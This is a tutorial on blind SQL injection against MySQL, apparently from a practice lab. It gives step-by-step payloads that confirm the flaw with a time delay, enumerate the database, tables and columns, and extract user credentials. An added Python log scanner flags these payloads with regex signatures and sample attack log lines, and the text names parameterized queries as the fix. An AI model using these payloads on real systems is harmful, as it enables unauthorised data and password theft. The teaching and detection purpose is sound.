Boolean blind injection
Determine whether there is SQL injection
Input:
1' and sleep(5) --
The response is delayed by 5 seconds, so a SQL injection vulnerability exists.
Get the database name
Functions used
if(1>2,1,0) # Tests whether the condition holds: returns 1 if true, 0 if false
substring('abcd',1,3) # Extracts three characters starting at the first character of the string
1. Determine the length of the database
1' and if(length(database())=4,1,0) --
2. Determine the database name
1' and if(substring(database(),2,1)='v',1,0) --
# Take the second character of the database name and check whether it is 'v'
Burp Suite settings used to assist with cracking
3. Determine the table name
1' and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1),1,1)='g',1,0) --
Use Burp Suite
4. Determine the column name
1' and if(substring((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME='users' and TABLE_SCHEMA=database() limit 1,1),1,1)='l',1,0) --
5. Obtain the account and password
1'and if(substring((select CONCAT(user,0x3a,PASSWORD) from users limit 1),1,1)='a',1,0) --
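A defender-side view of the probes above, as an added example that is not part of the original page: it scans decoded query parameters in access-log lines for the payload shapes used in steps 1 to 5 and flags a client that repeats the same probe with only the position or guessed character changed. The log format, the /item?id= endpoint, the sample lines and the threshold of 3 are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Signatures derived from the payload shapes shown on this page.
SIGNATURES = {
    "time_delay": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "boolean_probe": re.compile(r"\bif\s*\(\s*(?:length|substring)\s*\(", re.I),
    "schema_read": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "quote_comment": re.compile(r"'.*--\s*$"),
}

# Constructed sample log ("client request-target"); the /item?id= endpoint is hypothetical.
SAMPLE_LOG = """\
203.0.113.7 /item?id=1%27+and+sleep(5)+--+
203.0.113.7 /item?id=1%27+and+if(length(database())%3D4,1,0)+--+
203.0.113.7 /item?id=1%27+and+if(substring(database(),1,1)%3D%27a%27,1,0)+--+
203.0.113.7 /item?id=1%27+and+if(substring(database(),1,1)%3D%27b%27,1,0)+--+
203.0.113.7 /item?id=1%27+and+if(substring(database(),2,1)%3D%27a%27,1,0)+--+
198.51.100.4 /item?id=42
198.51.100.4 /search?q=what+if+(maybe)+it+rains
"""

def classify(value):
    """Return the sorted names of the signatures matching one decoded parameter value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))

def template(value):
    """Mask numbers and compared literals so guesses differing by one character collapse."""
    return re.sub(r"\d+", "N", re.sub(r"=\s*'[^']*'", "='?'", value.lower()))

def analyze(log_text, enum_threshold=3):
    """Map flagged clients to matched signatures; repeated look-alike probes set 'enumerating'."""
    findings, seen = {}, defaultdict(int)
    for line in filter(str.strip, log_text.splitlines()):
        client, target = line.split(maxsplit=1)
        for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = classify(value)
            if not hits:
                continue
            entry = findings.setdefault(client, {"signatures": set(), "enumerating": False})
            entry["signatures"].update(hits)
            seen[(client, template(value))] += 1
            entry["enumerating"] |= seen[(client, template(value))] >= enum_threshold
    return findings

if __name__ == "__main__":
    for client, info in analyze(SAMPLE_LOG).items():
        print(client, sorted(info["signatures"]), "enumerating:", info["enumerating"])
```

The signatures are heuristics for triage; the durable fix for the vulnerable query is a parameterized statement, which makes every payload above plain data.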